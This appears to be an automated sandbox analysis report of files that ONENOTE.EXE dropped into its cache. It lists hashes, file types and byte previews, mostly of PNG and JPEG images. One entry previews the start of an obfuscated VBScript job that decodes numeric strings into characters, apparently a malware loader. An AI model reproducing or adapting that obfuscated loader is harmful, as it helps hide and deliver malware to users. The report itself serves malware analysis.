                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004S.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004T.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004U.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000051.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55113
                                                                                                                                                                                                                  Entropy (8bit):5.216959514455489
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
                                                                                                                                                                                                                  MD5:AE25F2104967B2708AC9DBA80AAC52FD
                                                                                                                                                                                                                  SHA1:7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
                                                                                                                                                                                                                  SHA-256:11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
                                                                                                                                                                                                                  SHA-512:D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000052.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):567
                                                                                                                                                                                                                  Entropy (8bit):7.499095532051442
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                                                                                                                                  MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                                                                                                                                  SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                                                                                                                                  SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                                                                                                                                  SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000053.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):49224
                                                                                                                                                                                                                  Entropy (8bit):7.402134460714453
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                                                                                                                                  MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                                                                                                                                  SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                                                                                                                                  SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                                                                                                                                  SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000058.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40884
                                                                                                                                                                                                                  Entropy (8bit):7.545929039957292
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                                                                                                  MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                                                                                                  SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                                                                                                  SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                                                                                                  SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005A.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):24268
                                                                                                                                                                                                                  Entropy (8bit):6.946124661664625
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                                                                                                  MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                                                                                                  SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                                                                                                  SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                                                                                                  SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005C.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):39010
                                                                                                                                                                                                                  Entropy (8bit):7.362726513389497
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                                                                                                  MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                                                                                                  SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                                                                                                  SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                                                                                                  SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005E.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):59707
                                                                                                                                                                                                                  Entropy (8bit):7.858445368171059
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
                                                                                                                                                                                                                  MD5:47ADB0DF6FDA756920225A099B722322
                                                                                                                                                                                                                  SHA1:851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
                                                                                                                                                                                                                  SHA-256:EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
                                                                                                                                                                                                                  SHA-512:85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005G.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):27862
                                                                                                                                                                                                                  Entropy (8bit):7.238903610770013
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                                                                                                  MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                                                                                                  SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                                                                                                  SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                                                                                                  SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006L.bin

                                                                                                                                                                                                                  Download File
